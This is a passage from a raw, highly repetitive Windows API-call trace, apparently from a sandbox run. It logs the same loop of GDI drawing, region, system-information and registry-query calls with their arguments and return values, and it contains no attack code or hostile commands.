r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.711] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.711] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.711] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.711] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.711] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.711] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.712] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe304027d [0017.712] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xed040713 [0017.712] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c7f [0017.712] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c80 [0017.712] CombineRgn (hrgnDst=0x1040c7f, hrgnSrc1=0xe304027d, hrgnSrc2=0xed040713, iMode=1) returned 1 [0017.712] CombineRgn (hrgnDst=0x1040c80, hrgnSrc1=0xe304027d, hrgnSrc2=0xed040713, iMode=4) returned 2 [0017.712] CreateSolidBrush (color=0xff) returned 0x2100c7e [0017.712] CreateSolidBrush (color=0xff0000) returned 0x1100c81 [0017.712] DeleteObject (ho=0x1100c81) returned 1 [0017.712] DeleteObject (ho=0xed040713) returned 1 [0017.712] DeleteObject (ho=0xe304027d) returned 1 [0017.712] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.712] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.712] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.712] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.712] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.712] BeginPath (hdc=0x0) returned 0 [0017.712] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.712] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.712] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.712] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.712] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.712] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.712] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.712] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.713] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xee040713 [0017.713] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe404027d [0017.713] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c82 [0017.713] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c83 [0017.713] CombineRgn (hrgnDst=0x1040c82, hrgnSrc1=0xee040713, hrgnSrc2=0xe404027d, iMode=1) returned 1 [0017.713] CombineRgn (hrgnDst=0x1040c83, hrgnSrc1=0xee040713, hrgnSrc2=0xe404027d, iMode=4) returned 2 [0017.713] CreateSolidBrush (color=0xff) returned 0x2100c81 [0017.713] CreateSolidBrush (color=0xff0000) returned 0x1100c84 [0017.713] DeleteObject (ho=0x1100c84) returned 1 [0017.713] DeleteObject (ho=0xe404027d) returned 1 [0017.713] DeleteObject (ho=0xee040713) returned 1 [0017.713] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.713] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.713] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.713] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.713] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.713] BeginPath (hdc=0x0) returned 0 [0017.713] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.713] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.713] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.713] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.713] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.713] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.713] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.713] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.713] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe504027d [0017.713] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xef040713 [0017.713] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c85 [0017.714] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c86 [0017.714] CombineRgn (hrgnDst=0x1040c85, hrgnSrc1=0xe504027d, hrgnSrc2=0xef040713, iMode=1) returned 1 [0017.714] CombineRgn (hrgnDst=0x1040c86, hrgnSrc1=0xe504027d, hrgnSrc2=0xef040713, iMode=4) returned 2 [0017.714] CreateSolidBrush (color=0xff) returned 0x2100c84 [0017.714] CreateSolidBrush (color=0xff0000) returned 0x1100c87 [0017.714] DeleteObject (ho=0x1100c87) returned 1 [0017.714] DeleteObject (ho=0xef040713) returned 1 [0017.714] DeleteObject (ho=0xe504027d) returned 1 [0017.714] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.714] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.714] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.714] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.714] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.714] BeginPath (hdc=0x0) returned 0 [0017.714] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.714] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.714] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.714] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.714] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.714] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.714] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.714] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.714] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf0040713 [0017.714] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe604027d [0017.714] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c88 [0017.714] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c89 [0017.714] CombineRgn (hrgnDst=0x1040c88, hrgnSrc1=0xf0040713, hrgnSrc2=0xe604027d, iMode=1) returned 1 [0017.714] CombineRgn (hrgnDst=0x1040c89, hrgnSrc1=0xf0040713, hrgnSrc2=0xe604027d, iMode=4) returned 2 [0017.715] CreateSolidBrush (color=0xff) returned 0x2100c87 [0017.715] CreateSolidBrush (color=0xff0000) returned 0x1100c8a [0017.715] DeleteObject (ho=0x1100c8a) returned 1 [0017.715] DeleteObject (ho=0xe604027d) returned 1 [0017.715] DeleteObject (ho=0xf0040713) returned 1 [0017.715] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.715] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.715] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.715] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.715] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.715] BeginPath (hdc=0x0) returned 0 [0017.715] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.715] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.715] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.715] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.715] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.715] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.715] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.715] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.715] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe704027d [0017.715] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf1040713 [0017.715] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c8b [0017.715] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c8c [0017.715] CombineRgn (hrgnDst=0x1040c8b, hrgnSrc1=0xe704027d, hrgnSrc2=0xf1040713, iMode=1) returned 1 [0017.715] CombineRgn (hrgnDst=0x1040c8c, hrgnSrc1=0xe704027d, hrgnSrc2=0xf1040713, iMode=4) returned 2 [0017.715] CreateSolidBrush (color=0xff) returned 0x2100c8a [0017.715] CreateSolidBrush (color=0xff0000) returned 0x1100c8d [0017.715] DeleteObject (ho=0x1100c8d) returned 1 [0017.716] DeleteObject (ho=0xf1040713) returned 1 [0017.716] DeleteObject (ho=0xe704027d) returned 1 [0017.716] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.716] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.716] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.716] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.716] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.716] BeginPath (hdc=0x0) returned 0 [0017.716] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.716] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.716] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.716] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.716] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.716] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.716] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.716] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.716] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf2040713 [0017.716] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe804027d [0017.716] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c8e [0017.716] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c8f [0017.716] CombineRgn (hrgnDst=0x1040c8e, hrgnSrc1=0xf2040713, hrgnSrc2=0xe804027d, iMode=1) returned 1 [0017.716] CombineRgn (hrgnDst=0x1040c8f, hrgnSrc1=0xf2040713, hrgnSrc2=0xe804027d, iMode=4) returned 2 [0017.716] CreateSolidBrush (color=0xff) returned 0x2100c8d [0017.716] CreateSolidBrush (color=0xff0000) returned 0x1100c90 [0017.716] DeleteObject (ho=0x1100c90) returned 1 [0017.716] DeleteObject (ho=0xe804027d) returned 1 [0017.716] DeleteObject (ho=0xf2040713) returned 1 [0017.716] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.716] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.717] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.717] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.717] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.717] BeginPath (hdc=0x0) returned 0 [0017.717] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.717] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.717] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.717] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.717] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.717] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.717] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.717] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.717] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe904027d [0017.717] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf3040713 [0017.717] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c91 [0017.717] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c92 [0017.717] CombineRgn (hrgnDst=0x1040c91, hrgnSrc1=0xe904027d, hrgnSrc2=0xf3040713, iMode=1) returned 1 [0017.717] CombineRgn (hrgnDst=0x1040c92, hrgnSrc1=0xe904027d, hrgnSrc2=0xf3040713, iMode=4) returned 2 [0017.717] CreateSolidBrush (color=0xff) returned 0x2100c90 [0017.717] CreateSolidBrush (color=0xff0000) returned 0x1100c93 [0017.717] DeleteObject (ho=0x1100c93) returned 1 [0017.717] DeleteObject (ho=0xf3040713) returned 1 [0017.717] DeleteObject (ho=0xe904027d) returned 1 [0017.717] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.717] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.718] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.718] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.718] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.718] BeginPath (hdc=0x0) returned 0 [0017.718] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.718] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.718] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.718] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.718] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.718] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.718] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.718] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.718] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf4040713 [0017.718] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xea04027d [0017.718] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c94 [0017.718] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c95 [0017.718] CombineRgn (hrgnDst=0x1040c94, hrgnSrc1=0xf4040713, hrgnSrc2=0xea04027d, iMode=1) returned 1 [0017.718] CombineRgn (hrgnDst=0x1040c95, hrgnSrc1=0xf4040713, hrgnSrc2=0xea04027d, iMode=4) returned 2 [0017.718] CreateSolidBrush (color=0xff) returned 0x2100c93 [0017.718] CreateSolidBrush (color=0xff0000) returned 0x1100c96 [0017.718] DeleteObject (ho=0x1100c96) returned 1 [0017.718] DeleteObject (ho=0xea04027d) returned 1 [0017.718] DeleteObject (ho=0xf4040713) returned 1 [0017.718] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.718] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.718] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.718] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.718] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.719] BeginPath (hdc=0x0) returned 0 [0017.719] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.719] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.719] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.719] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.719] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.719] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.719] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.719] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.719] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xeb04027d [0017.719] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf5040713 [0017.719] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c97 [0017.719] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c98 [0017.719] CombineRgn (hrgnDst=0x1040c97, hrgnSrc1=0xeb04027d, hrgnSrc2=0xf5040713, iMode=1) returned 1 [0017.719] CombineRgn (hrgnDst=0x1040c98, hrgnSrc1=0xeb04027d, hrgnSrc2=0xf5040713, iMode=4) returned 2 [0017.719] CreateSolidBrush (color=0xff) returned 0x2100c96 [0017.719] CreateSolidBrush (color=0xff0000) returned 0x1100c99 [0017.719] DeleteObject (ho=0x1100c99) returned 1 [0017.719] DeleteObject (ho=0xf5040713) returned 1 [0017.719] DeleteObject (ho=0xeb04027d) returned 1 [0017.719] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.719] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.719] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.719] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.719] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.719] BeginPath (hdc=0x0) returned 0 [0017.719] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.719] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.719] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.719] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.720] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.720] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.720] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.720] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.720] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf6040713 [0017.720] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xec04027d [0017.720] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c9a [0017.720] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c9b [0017.720] CombineRgn 